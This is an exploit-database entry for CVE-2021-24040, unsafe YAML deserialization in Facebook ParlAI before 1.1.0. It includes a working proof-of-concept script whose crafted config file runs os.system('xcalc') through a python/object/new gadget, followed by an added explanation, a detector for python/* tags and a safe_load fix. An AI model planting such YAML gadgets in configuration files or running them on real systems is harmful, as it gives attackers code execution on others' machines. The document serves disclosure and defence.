Facebook parlai 1.0.0 deserialization of untrusted data in parlai Vulnerability / Exploit


Exploits / Vulnerability Discovered : 2021-09-13 | Type : local | Platform : python


[+] Code ...

# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai
# Date: 2021-09-11
# Exploit Author: Abhiram V
# Vendor Homepage: https://parl.ai/
# Software Link: https://github.com/facebookresearch/ParlAI
# Version: < 1.1.0
# Tested on: Linux
# CVE: CVE-2021-24040
# References :
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg
# https://anon-artist.github.io/blogs/blog3.html

############################################################################

Introduction
ParlAI (pronounced "par-lay") is a free, open-source Python framework for
sharing, training and evaluating AI models on a variety of openly available
dialogue datasets.

############################################################################

Vulnerability details

############################################################################

Description
ParlAI's chat service configuration parser (parlai.chat_service.utils.config)
loaded the YAML config file with an unsafe loader that honours PyYAML's
python/* tags. A crafted config file can therefore instantiate arbitrary
Python objects and call arbitrary callables while it is being parsed, which
gives arbitrary code execution in the process that reads the file. Fixed in
ParlAI 1.1.0.

Proof of Concept

Create the following PoC file (exploit.py)

import os  # only needed if you uncomment the install helper below
# os.system('pip3 install parlai')   # installs the (vulnerable) package
from parlai.chat_service.utils import config

# YAML document abusing PyYAML's python/* tags:
#   !!python/object/new:type with args ["z", (), {"extend": exec}]
#       -> type("z", (), {"extend": exec}): a new class whose class
#          attribute "extend" is the builtin exec
#   listitems: "<code>"
#       -> the constructor then calls instance.extend(listitems),
#          i.e. exec("__import__('os').system('xcalc')")
exploit = """!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
with open('config.yml', 'w+') as f:
    f.write(exploit)
config.parse_configuration_file('config.yml')  # unsafe load runs the payload

Run the script with python3 exploit.py. On a vulnerable install, xcalc is
launched by the YAML loader while config.yml is being parsed; nothing in the
config file is ever used by ParlAI, the code runs during deserialization.
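The following is an added example, not code from the advisory, the PoC author or the ParlAI project. It shows in plain Python why the payload above executes code and how to close the hole: part 1 re-enacts the steps PyYAML's python/object/new constructor performs (re-implemented here for illustration, not PyYAML's own code); part 2 is a small stdlib pre-filter that flags python/* tags in untrusted YAML, useful for hunting config files on disk; part 3 is the real fix, yaml.safe_load. The names apply_python_object_new, find_python_tags, parse_config_safely, PAYLOAD_DOC and SIDE_EFFECTS are this example's own; PAYLOAD_DOC is the page's payload with the xcalc command swapped for a harmless marker, and PyYAML is assumed only for part 3 (imported lazily so parts 1 and 2 run without it).

```python
"""Why the PoC payload runs code, and how to close it (added example)."""
import os
import re
import tempfile

# The page's payload with the xcalc command swapped for a harmless marker
# (constructed input for this example).
PAYLOAD_DOC = """!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "SIDE_EFFECTS.append('payload ran')"
"""

SIDE_EFFECTS = []   # the benign payload appends here instead of spawning xcalc


def apply_python_object_new(cls, args, listitems):
    """Mirror of what PyYAML's unsafe/Full constructors do for a
    `!!python/object/new:<cls>` node carrying `args:` and `listitems:`
    (illustrative re-implementation, not PyYAML's code)."""
    instance = cls.__new__(cls, *args)   # newobj path: cls.__new__(cls, *args)
    if listitems:
        instance.extend(listitems)       # listitems -> instance.extend(listitems)
    return instance


def run_payload_gadget():
    """The page's gadget: type("z", (), {"extend": exec}) creates a class whose
    class attribute `extend` is the builtin exec. Builtin functions are not
    descriptors, so z.extend is exec itself and z.extend(code) == exec(code).
    Returns the name of the class the gadget created."""
    z = apply_python_object_new(type, ("z", (), {"extend": exec}),
                                "SIDE_EFFECTS.append('payload ran')")
    return z.__name__


# Short form (!!python/...) and the long form (!<tag:yaml.org,2002:python/...>).
PYTHON_TAG = re.compile(r"!!python/[\w/]+(?::[\w.]+)?"
                        r"|!<tag:yaml\.org,2002:python/[^>\s]+>")


def find_python_tags(text):
    """Stdlib pre-filter: every PyYAML python/* tag in a document, in order.
    A defence-in-depth check and a hunting rule for config files, not a
    substitute for safe_load: anything the SafeLoader does not know must be
    rejected by the loader itself."""
    return PYTHON_TAG.findall(text)


def parse_config_safely(path):
    """Hardened counterpart of the vulnerable loading step: yaml.safe_load only
    constructs core YAML types, so python/* tags raise
    yaml.constructor.ConstructorError instead of running code."""
    import yaml   # PyYAML, assumed installed for this part only
    with open(path) as f:
        return yaml.safe_load(f)


if __name__ == "__main__":
    SIDE_EFFECTS.clear()
    print("gadget built class:", run_payload_gadget(), "->", SIDE_EFFECTS)
    print("python/* tags in payload:", find_python_tags(PAYLOAD_DOC))
    try:
        import yaml
    except ImportError:
        print("PyYAML not installed; skipping the safe_load demonstration")
    else:
        with tempfile.NamedTemporaryFile("w", suffix=".yml", delete=False) as f:
            f.write(PAYLOAD_DOC)
        try:
            parse_config_safely(f.name)
        except yaml.constructor.ConstructorError as e:
            print("safe_load refused the payload:", str(e).splitlines()[0])
        finally:
            os.unlink(f.name)
```

Running the script prints the class the gadget built ("z") next to the marker the payload appended, lists the three python/* tags in the document, and, when PyYAML is present, shows safe_load rejecting the root node with a ConstructorError before any of the inner tags are even looked at. The same payload fed to a loader that honours python/* tags, as the PoC does, reaches the exec call instead.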

Impact
Arbitrary code execution with the privileges of the user running ParlAI,
triggered by parsing an attacker-controlled chat service config file.

############################################################################